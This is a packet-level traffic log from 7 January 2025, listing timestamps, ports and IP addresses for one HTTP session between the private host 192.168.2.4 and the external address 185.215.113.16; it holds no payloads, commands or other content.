Jan 7, 2025 10:08:23.144813061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144834042 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144870043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144881964 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144933939 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144968987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144979000 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144989967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145003080 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145014048 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145016909 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145045042 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145061970 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145098925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145111084 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145122051 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145133018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145144939 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145154953 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145157099 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145167112 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145203114 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145459890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145474911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145488024 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145503998 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145514965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145517111 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145549059 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145550966 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145618916 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145684004 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145694017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145705938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145744085 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145767927 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145783901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145816088 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.145895958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145906925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.145939112 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.146028042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146039963 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146050930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146076918 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.146117926 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.146136045 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146147966 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146159887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146169901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146182060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146188021 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.146218061 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.146262884 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146275043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146286011 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146296978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146302938 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.146307945 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146331072 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.146357059 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.146389961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146409035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146419048 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.146459103 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.147233963 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147247076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147257090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147267103 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147305965 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.147341013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147356033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147358894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147363901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147380114 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.147401094 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.147931099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147943020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147962093 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147973061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147979021 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.147984028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.147994995 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.148021936 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.148036957 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.202636957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.202693939 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.202981949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.202992916 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.203046083 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.203243971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.203255892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.203270912 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.203283072 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.203299046 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.203325033 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.204026937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.204042912 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.204082966 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.206753016 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.206764936 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.206815958 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.242548943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.242571115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.242580891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.242629051 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.267574072 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.267586946 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.267597914 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.267621040 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.267649889 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.267843962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.267855883 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.267868042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.267911911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.267923117 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.267925024 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.267981052 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.268528938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268539906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268553972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268563986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268573999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268582106 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.268587112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268596888 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.268618107 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.268656969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268668890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268678904 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268693924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268706083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268706083 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.268719912 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.268749952 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.268774033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268785954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.268826008 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269099951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269109964 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269123077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269134045 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269162893 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269182920 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269210100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269220114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269226074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269263983 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269342899 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269354105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269365072 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269375086 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269385099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269391060 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269397020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269412041 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269416094 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269443035 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269454002 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269548893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269558907 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269565105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269570112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269603968 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269604921 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269638062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269649029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269658089 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.269707918 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.269707918 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270024061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270035982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270054102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270065069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270076036 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270076990 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270087004 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270107031 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270122051 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270131111 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270143032 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270153999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270179033 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270273924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270283937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270294905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270308018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270315886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270322084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270337105 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270354986 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270474911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270487070 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270498037 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270517111 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270534992 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270546913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270611048 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270750046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270760059 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270771027 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270782948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270792961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270803928 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270807028 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270821095 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270833015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270845890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270874977 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.270879984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270889997 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270900965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270910978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.270936012 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.271038055 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271048069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271064997 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271075010 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271078110 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.271091938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271105051 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271115065 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.271116018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271127939 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.271157026 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.271182060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271193027 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271231890 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.271352053 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271363020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271373034 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.271424055 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.272551060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.272578955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.272591114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.272600889 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.272613049 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.272619963 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.272624969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.272636890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.272645950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.272651911 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.272696972 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.273045063 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.273062944 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.273076057 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.273086071 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.273114920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.273121119 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.273195982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.273206949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.273241997 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.319443941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.319456100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.319470882 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.319500923 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.319544077 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.325711012 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.325730085 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.325742960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.325752974 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.325763941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.325773001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.325783968 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.325818062 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.325999022 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.326010942 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.326021910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.326061010 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.367801905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.367814064 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.367824078 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.367863894 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.367899895 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.392797947 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.392910957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.392920017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.392930984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.392941952 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.392951965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.392962933 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.392966032 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.392982006 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.392992020 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.393033981 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.393271923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393301010 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393312931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393322945 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393356085 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.393806934 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393816948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393826962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393862009 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.393959999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393970966 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393980026 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393985033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.393990040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394000053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394006968 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394032955 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394146919 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394157887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394166946 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394196033 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394207954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394220114 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394222975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394285917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394295931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394332886 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394429922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394438982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394448996 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394459009 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394467115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394488096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394495964 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394500017 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394500971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394504070 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394505024 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394526958 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394556046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394557953 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394567013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394608974 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394623041 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394773960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394783020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394793034 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394821882 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394823074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394833088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.394884109 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.394884109 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.395134926 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.395147085 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.395157099 CET	80	49884	185.215.113.16	192.168.2.4
